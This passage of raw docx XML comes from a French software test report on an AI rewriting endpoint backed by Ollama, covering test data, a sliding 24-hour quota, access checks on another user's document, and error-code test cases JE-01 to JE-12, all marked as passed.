              <w:t xml:space="preserve">D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Note interne — procédure de congés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un paragraphe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Document vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Courriel de relance client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Deux phrases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Journal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">pré-rempli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pour le compte U1 : 19 lignes datées de moins de 24 heures, et 1 ligne datée de 25 heures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette dernière ligne est la donnée la plus utile du jeu d'essai. Elle est le seul moyen de distinguer une fenêtre glissante d'un compteur journalier : sans elle, le cas JE-07 passerait quelle que soit l'implémentation. Construire un jeu de données, c'est surtout choisir les valeurs qui font échouer les mauvaises implémentations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="135" w:name="Xd173a75c81b537f6fe70059a4edcbdaa7caa4be"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cas d'essai et résultats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le double de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call_ollama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">renvoie une valeur fixe —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">("Texte reformulé.", 42)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— pour que le résultat attendu soit déterministe. L'appel réel au modèle est vérifié séparément (JE-12).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofi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Compte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Données d'entrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">reformuler</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">selection</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, contenu = 1 paragraphe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">content_after</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">non vide ;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">tokens_used</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">= 42 ; 1 ligne ajoutée dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; D1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">inchangé</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">en base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-02</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corriger</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">document</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, contenu = document entier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; ligne journalisée avec</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type_action = "corriger"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-03</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completer</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">instructions</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">= « ton plus formel »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; la consigne figure en fin du prompt transmis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type_action = "traduire"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; message listant les trois actions autorisées ; aucune ligne dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">scope = "paragraphe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; aucune ligne dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-06</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contenu = ""</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">« Le champ contenu est requis »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1, action valide (19 appels récents + 1 de 25 h)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— l'appel de 25 h est hors fenêtre, le quota n'est pas atteint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le même appel, immédiatement répété (20 appels récents)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">429</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">« Quota IA quotidien atteint (20 requêtes / 24h). » ; aucune ligne ajoutée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">D2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— document de U2 — action valide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">« Document introuvable » ; corps identique à JE-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identifiant inexistant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; corps strictement identique à JE-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-11</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contenu</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>de 3 001 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; aucun appel au modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">reformuler</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">moteur d'inférence arrêté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">502</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">« Impossible de joindre Ollama… » ;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">aucune</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ligne dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; quota inchangé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
